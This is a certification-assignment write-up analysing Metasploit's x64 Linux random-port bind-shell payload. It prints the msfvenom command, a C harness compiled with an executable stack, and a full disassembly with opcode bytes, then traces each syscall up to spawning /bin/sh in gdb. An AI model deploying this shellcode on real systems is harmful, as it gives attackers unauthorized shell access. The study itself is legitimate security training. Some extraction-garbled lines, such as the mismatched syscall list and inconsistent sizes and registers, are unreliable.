The first msfvenom
shellcode that is going to be dissected in functionality is the linux/x64/shell_bind_tcp_random_port
Let's see it's options:
SLAE64> msfvenom -p linux/x64/shell_bind_tcp_random_port --list-options
Options for payload/linux/x64/shell_bind_tcp_random_port:
Name: Linux Command Shell, Bind TCP Random Port Inline
Module: payload/linux/x64/shell_bind_tcp_random_port
Platform: Linux
Arch: x64
Needs Admin: No
Total size: 57
Rank: Normal
Provided by:
Geyslan G. Bem <>
Listen for a connection in a random port and spawn a command shell.
Use nmap to discover the open port: 'nmap -sS target -p-'.
The payload is only 78 bytes and it requires the following parameters:
: The port to listen for the incoming connectionRHOST
: The target address
NOTE: In the captures of
, comments are especified with the<==
symbol. This is added when want to comment what's going on in the debugger.
Will execute the ls -l
command. Decided to use a command that can receive options to check how the payload handles it. Also added the full path to make the command string a 7 bytes length only. Let's generate the payload:
SLAE64> msfvenom -p linux/x64/shell_bind_tcp_random_port -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 57 bytes
Final size of c file: 264 bytes
unsigned char buf[] =
The generated payload size, this time did not change in size.
To run the shellcode, will use of the shellcode.c
template renamoed to Payload_02.c
. The shellcode is placed in the code[]
#include <stdio.h>
#include <string.h>
unsigned char code[]= \
void main()
printf("ShellCode Lenght: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
Now it can be compiled:
gcc -fno-stack-protector -z execstack Payload_02.c -o Payload_02
When it's run, is listens for incoming connections in a random port. From another terminal using netstat
check what's the listening port, and with netcat
, can connect. A shell is spawned:
Once we get the executable, will use objdump
to disassemble the ASM code. As objdump
disassembles the code by sections, the one of interest is the <code>
section. Is the one containing the payload shellcode:
SLAE64> objdump -M intel -D Payload_02
0000000000004060 <code>:
4060: 48 31 f6 xor rsi,rsi
4063: 48 f7 e6 mul rsi
4066: ff c6 inc esi
4068: 6a 02 push 0x2
406a: 5f pop rdi
406b: b0 29 mov al,0x29
406d: 0f 05 syscall
406f: 52 push rdx
4070: 5e pop rsi
4071: 50 push rax
4072: 5f pop rdi
4073: b0 32 mov al,0x32
4075: 0f 05 syscall
4077: b0 2b mov al,0x2b
4079: 0f 05 syscall
407b: 57 push rdi
407c: 5e pop rsi
407d: 48 97 xchg rdi,rax
407f: ff ce dec esi
4081: b0 21 mov al,0x21
4083: 0f 05 syscall
4085: 75 f8 jne 407f <code+0x1f>
4087: 52 push rdx
4088: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
408f: 2f 73 68
4092: 57 push rdi
4093: 54 push rsp
4094: 5f pop rdi
4095: b0 3b mov al,0x3b
4097: 0f 05 syscall
Per the disassembled code, a total of 5 syscalls been used. Let's see which ones are for the values of RAX before syscall
: Value 0x29sys_listen
: Value 0x32sys_accept
: Value 0x2bsys_dup2
: Value 0x21sys_execve
: Value 0x3b
As how the shellcode is disasembled, the code can be divided in sections. This sections are defined by the different syscalls. To simplify the analysis, we going to debug section by section.
Let's load the exec file into gdb
, setup the environment, and place a breakpoint in the code section with b *&code
SLAE64> gdb ./Payload_02
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Reading symbols from ./Payload_02...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) b *&code
Breakpoint 1 at 0x4060
Now can start debugging, let's run
the program and disassemble
(gdb) run
Starting program: /root/SLAE64/Exam/Assignment05/Payload_02
ShellCode Lenght: 57
Breakpoint 1, 0x0000555555558060 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x0000555555558060 <+0>: xor rsi,rsi
0x0000555555558063 <+3>: mul rsi
0x0000555555558066 <+6>: inc esi
0x0000555555558068 <+8>: push 0x2
0x000055555555806a <+10>: pop rdi
0x000055555555806b <+11>: mov al,0x29
0x000055555555806d <+13>: syscall
0x000055555555806f <+15>: push rdx
0x0000555555558070 <+16>: pop rsi
0x0000555555558071 <+17>: push rax
0x0000555555558072 <+18>: pop rdi
0x0000555555558073 <+19>: mov al,0x32
0x0000555555558075 <+21>: syscall
0x0000555555558077 <+23>: mov al,0x2b
0x0000555555558079 <+25>: syscall
0x000055555555807b <+27>: push rdi
0x000055555555807c <+28>: pop rsi
0x000055555555807d <+29>: xchg rdi,rax
0x000055555555807f <+31>: dec esi
0x0000555555558081 <+33>: mov al,0x21
0x0000555555558083 <+35>: syscall
0x0000555555558085 <+37>: jne 0x55555555807f <code+31>
0x0000555555558087 <+39>: push rdx
0x0000555555558088 <+40>: movabs rdi,0x68732f6e69622f2f
0x0000555555558092 <+50>: push rdi
0x0000555555558093 <+51>: push rsp
0x0000555555558094 <+52>: pop rdi
0x0000555555558095 <+53>: mov al,0x3b
0x0000555555558097 <+55>: syscall
0x0000555555558099 <+57>: add BYTE PTR [rax],al
End of assembler dump.
All looks good, let's dissect the functionality.
In this section, the socket
call is to be used. From it's man page can get the function definition:
int socket(int domain, int type, int protocol);
Then registers for this syscall need to get the following values:
- RAX gets the syscall number, 0x29
- RDI gets the domain. As it's an IPv4 connection, value has to be 2 (AF_INET)
- RSI gets the type of the connection. As it's a TCP oriented connection, value has to be 0x01 (SOCK_STREAM)
- RDX gets the protocol. As it's an IP connection, value has to be 0x00 Let's debug this part, reviewing that registers get this values before the syscall, and understanding what's done in the code:
(gdb) stepi
0x0000555555558063 in code ()
(gdb) stepi
0x0000555555558066 in code ()
(gdb) stepi
0x0000555555558068 in code ()
(gdb) stepi
0x000055555555806a in code ()
(gdb) stepi
0x000055555555806b in code ()
(gdb) stepi
0x000055555555806d in code ()
(gdb) disassemble
Dump of assembler code for function code:
0x0000555555558060 <+0>: xor rsi,rsi <== ZEROes RSI
0x0000555555558063 <+3>: mul rsi <== RAX <- 0 and RDX <- 0
0x0000555555558066 <+6>: inc esi <== RSI <- 1 for SOCK_STREAM
0x0000555555558068 <+8>: push 0x2 <== RDI <- 2 for AF_INET
0x000055555555806a <+10>: pop rdi
0x000055555555806b <+11>: mov al,0x29 <== RAX <- 0x29 for syscall number
=> 0x000055555555806d <+13>: syscall
End of assembler dump.
At this point, let's review that registers got the right values:
(gdb) info registers rax rdi rsi rdx
rax 0x29 41
rdi 0x2 2
rsi 0x1 1
rdx 0x0 0
Then the syscall can be run, as the parameters are correct. Remember that this syscall returns in RAX the socket descriptor.
(gdb) stepi
0x000055555555806f in code ()
Here in this section the listen
call. From the man page:
int listen(int sockfd, int backlog);
Values for registers for this call have to be:
- RAX gets the syscall number, 0x32
- RDI gets the sock_descriptor
- RSI gets the backlog, 0x00 Let's understand the code here:
(gdb) stepi
0x0000555555558070 in code ()
(gdb) stepi
0x0000555555558071 in code ()
(gdb) stepi
0x0000555555558072 in code ()
(gdb) stepi
0x0000555555558073 in code ()
(gdb) stepi
0x0000555555558075 in code ()
(gdb) disassemble
Dump of assembler code for function code:
0x000055555555806f <+15>: push rdx <== Stack <- 0x00. RDX been zero'ed at +3
0x0000555555558070 <+16>: pop rsi <== RSI <- 0 for the parameter
0x0000555555558071 <+17>: push rax <== Pushes the socket descriptor in the stack
0x0000555555558072 <+18>: pop rdi <== RDI <- socket descriptor. Pop'ed from stack
0x0000555555558073 <+19>: mov al,0x32 <== RAX <- Syscall number
=> 0x0000555555558075 <+21>: syscall
End of assembler dump.
Everyting looks correct. Let's check if the registers have the right values before the syscall:
(gdb) info registers rax rdi rsi
rax 0x32 50
rdi 0x3 3
rsi 0x0 0
Good. s expected.
For theaccept
call, it's defined as:
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
Registers need this values:
- RAX for the syscall number, 0x2b
- RDI for the socket descriptor, that's already in RDI from the previous section (value "3")
- RSI a pointer to the sockaddr
- RDX the length of this struct
As i don't understand why no values are assigned to RSI and RDX in the code, a further read of the
man page, clarifies everything:
When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL.
This mean that this two registers can be set to 0x00. Let's understand what the code does:
(gdb) stepi
0x0000555555558077 in code ()
(gdb) stepi
0x0000555555558079 in code ()
(gdb) disassemble
Dump of assembler code for function code:
0x0000555555558077 <+23>: mov al,0x2b <== Syscall number for accept()
=> 0x0000555555558079 <+25>: syscall
End of assembler dump.
RSI and RDX already got the NULL (0x00
) value at instructions at +16 and + 18. Let's review the values of the registers before the syscall:
(gdb) info registers rax rdi rsi rdx
rax 0x2b 43
rdi 0x3 3
rsi 0x0 0
rdx 0x0 0
Good, the expected values. The syscall can be executed, and will return a socket descriptor in RAX.
From the dup2()
int dup2(int oldfd, int newfd);
This said, register values for this call have to be:
- RAX for the syscall number, 0x21
- RDI for the old socket descriptor. Has to be the value returned in RAX for the previous
syscall - RSI for new file descriptor to duplicate the old descriptor. Will be the file descriptor for
, andstderr
Ass the
will pause the program until a connection is received, anetcat
connection is done from another terminal. Still while debugging, the program wont work as expected because nodup2()
and noexecve()
been done yet.
Reviewing the code:
(gdb) stepi
0x000055555555807b in code ()
(gdb) stepi
0x000055555555807c in code ()
(gdb) stepi
0x000055555555807d in code ()
(gdb) stepi
0x000055555555807f in code ()
(gdb) stepi
0x0000555555558081 in code ()
(gdb) stepi
0x0000555555558083 in code ()
(gdb) disassemble
Dump of assembler code for function code:
0x000055555555807b <+27>: push rdi <== RDI has the socket descriptor from `socket` call (that's "3")
0x000055555555807c <+28>: pop rsi <== RSI <- Socket descriptor
0x000055555555807d <+29>: xchg rdi,rax <== RDI <- Socket descriptor for the `accept`. This is the
0x000055555555807f <+31>: dec esi <== RDI = RDI - 1
0x0000555555558081 <+33>: mov al,0x21 <== Syscall Number for `dup2`
=> 0x0000555555558083 <+35>: syscall
0x0000555555558085 <+37>: jne 0x55555555807f <code+31> <== Jumps to +31 to `dup2()` another new file descriptor
End of assembler dump.
The code simply places the old file descriptor into RDI, and the new one into RSI. The jne
at +37 jumps back to +31, that decrements the value for RSI to duplicate another new file descriptor. New file descriptors will be duplicated in this order: stderr
("2"), stdout
("1") and then stdin
("0"). When RSI value is "0", then the jump is not done and the program continues the flow.
To check that register valuesare correct before the syscall, let's place a breakpoinit at the +35 just before executing the syscall to be able to review it the 3 times it's called. Also at +39 push rdx
after the duplication code to stop once it's done:
(gdb) disassemble
Dump of assembler code for function code:
0x000055555555807b <+27>: push rdi
0x000055555555807c <+28>: pop rsi
0x000055555555807d <+29>: xchg rdi,rax
0x000055555555807f <+31>: dec esi
0x0000555555558081 <+33>: mov al,0x21
=> 0x0000555555558083 <+35>: syscall
0x0000555555558085 <+37>: jne 0x55555555807f <code+31>
0x0000555555558087 <+39>: push rdx
End of assembler dump.
(gdb) info registers rdi rsi rax
rdi 0x4 4
rsi 0x2 2
rax 0x21 33
(gdb) b *0x0000555555558083
Breakpoint 2 at 0x555555558083
(gdb) b *0x0000555555558087
Breakpoint 3 at 0x555555558087
In the first loop to duplicate stderr
, RAX has to be 0x21, RDI has to be "0x04", and RSI has to be "0x02". Let's check:
(gdb) info registers rax rdi rsi
rax 0x21 33
rdi 0x4 4
rsi 0x2 2
Let's continue
execution. It will do the jump, do the operations, and again before executing the syscall. This is loop 2 to duplicate stdout
, hence values for registers must be "0x21" for RAX, "0x04" for RDI and "0x01" for RSI:
(gdb) c
Breakpoint 2, 0x0000555555558083 in code ()
(gdb) disassemble
Dump of assembler code for function code:
0x000055555555807b <+27>: push rdi
0x000055555555807c <+28>: pop rsi
0x000055555555807d <+29>: xchg rdi,rax
0x000055555555807f <+31>: dec esi
0x0000555555558081 <+33>: mov al,0x21
=> 0x0000555555558083 <+35>: syscall
0x0000555555558085 <+37>: jne 0x55555555807f <code+31>
End of assembler dump.
(gdb) info registers rax rdi rsi
rax 0x21 33
rdi 0x4 4
rsi 0x1 2
If continue
again, will jump to +31 again for the duplication of stdin
. Here the values have to be RAX to "0x21", RDI keeps the "0x04" value, and RSI updates to "0x00".
(gdb) c
Breakpoint 2, 0x0000555555558083 in code ()
(gdb) disassemble
Dump of assembler code for function code:
0x000055555555807b <+27>: push rdi
0x000055555555807c <+28>: pop rsi
0x000055555555807d <+29>: xchg rdi,rax
0x000055555555807f <+31>: dec esi
0x0000555555558081 <+33>: mov al,0x21
=> 0x0000555555558083 <+35>: syscall
0x0000555555558085 <+37>: jne 0x55555555807f <code+31>
End of assembler dump.
(gdb) info registers rax rdi rsi
rax 0x21 33
rdi 0x4 4
rsi 0x0 0
Awesome. Everything as it should. Now let's continue
the program, and this time won't jump and will stop at +39, ending the dup2
(gdb) c
Breakpoint 3, 0x0000555555558087 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x0000555555558087 <+39>: push rdx
End of assembler dump.
From the execve
int execve (const char *filename,
const char *argv [], const char
Also reviewing the code for this section in gdb
, there is an hex value (0x68732f6e69622f2f
) at +40 that ends being pushed in the stack at +50. Let's see what this value is:
>>> "68732f6e69622f2f".decode('hex')[::-1]
This means that execve
will execute the hardcoded command //bin/sh
. And this defines values for the registers as follows:
- RAX: Syscall number, "0x3b"
- RDI: The memory address for the
string - RSI: The pointer to the memory address containing the address of the parameters. As no parameters are needed or used, simply gets the NULL value "0x00"
- RDX: NULL value, "0x00"
The Stack Technique is used, hence will need to review the values pushed in the stack before the syscall and the registers contents.
'ing and following the code, and stop just before the syscall:
(gdb) disassemble
Dump of assembler code for function code:
=> 0x0000555555558087 <+39>: push rdx
0x0000555555558088 <+40>: movabs rdi,0x68732f6e69622f2f
0x0000555555558092 <+50>: push rdi
0x0000555555558093 <+51>: push rsp
0x0000555555558094 <+52>: pop rdi
0x0000555555558095 <+53>: mov al,0x3b
0x0000555555558097 <+55>: syscall
End of assembler dump.
(gdb) stepi <== Executes push rdx
0x0000555555558088 in code ()
(gdb) x/xg $rsp
0x7fffffffe750: 0x0000000000000000 <== RDX is Pushed. RDX had 0x00 value from +3
(gdb) stepi <== Executes movabs rdi,"//bin/sh"
0x0000555555558092 in code ()
(gdb) stepi <== Pushes String to Stack. Executes push rdi
0x0000555555558093 in code ()
(gdb) x/s $rsp <== Check top of the stack
0x7fffffffe748: "//bin/sh" <== The string is in the stack
(gdb) stepi <== Pushes the address of //bin/sh string into
0x0000555555558094 in code () == the stack. Executes push rsp
(gdb) stepi <== RDI <- @ //bin/sh string. Executes pop rdi
0x0000555555558095 in code ()
(gdb) stepi
0x0000555555558097 in code ()
Now the RIP is pointing to the syscall
instruction. Let's stop here. The stack contents for what's been just debuged should be:
Stack Address Stack Content
| 0x7fffffffe748 | "//bin/sh" |
| 0x7fffffffe750 | 0x0000000000000000 |
Let's check that's ok:
(gdb) x/2xg $rsp
0x7fffffffe748: 0x68732f6e69622f2f 0x0000000000000000
Hence, RSI should have the 0x7fffffffe748
as per the instruction executed at +52:
(gdb) info registers rdi
rdi 0x7fffffffe748 140737488349000
(gdb) x/s $rdi
0x7fffffffe748: "//bin/sh"
And RSI and RDX should have NULL values as no parameters are passed to the function:
(gdb) info registers rsi rdx
rsi 0x0 0
rdx 0x0 0
Ok, all looks as it was expected. After stepi
into the syscall, the shell will be spawned in our netcat
session that we had to open to continue debugging in the previous sections:
(gdb) stepi
process 1513 is executing new program: /usr/bin/dash
With the expected results:
However, didnt came this following question to you? Where is the code to generate the random port number? This is answered below
From this analysis, some tricks been learned:
- No need to use the
syscall. As the code did not use it, researched about why not being used, and came up with a comment at StackOverflow. There are some posts that says that if a TCP or UDP socket is being used, the kernel will automatically bind the socket to a suitable port number. This also the way that the payload uses to generate the random port!. As the kernel defines a random port and binds it to the connection, the code to create a random port is not needed and reduces considerably the shellcode size. - When using the
, no value it returns in the sockaddr struct will be used. Researching reading the man page further, in the thirth paragraph of the Description section, says that "When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL.". Not having to do all this work saves us time and shellcode size. - When the command to be executed by
does not have any parameter, the second and thirth parameter can be NULL. Then only the command is executed without parameters. - The use of the
instruction to initialize to "0x00" the value of RAX and RDX registers at the same time.
With this learnings, will have to review the payloads created in the Assignment01 and Assignment02 applying this learned techniques to make their shellcode size reduced.
The GitHub Repo for this assignment contains the following files:
- Payload_02.c : The C file cloned from
to execute thelinux/x64/shell_bind_tcp_random_port
shellcode. - Shellcode_02.txt : The rax shellcode in hex into a text file.
This pages have been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: PA-14628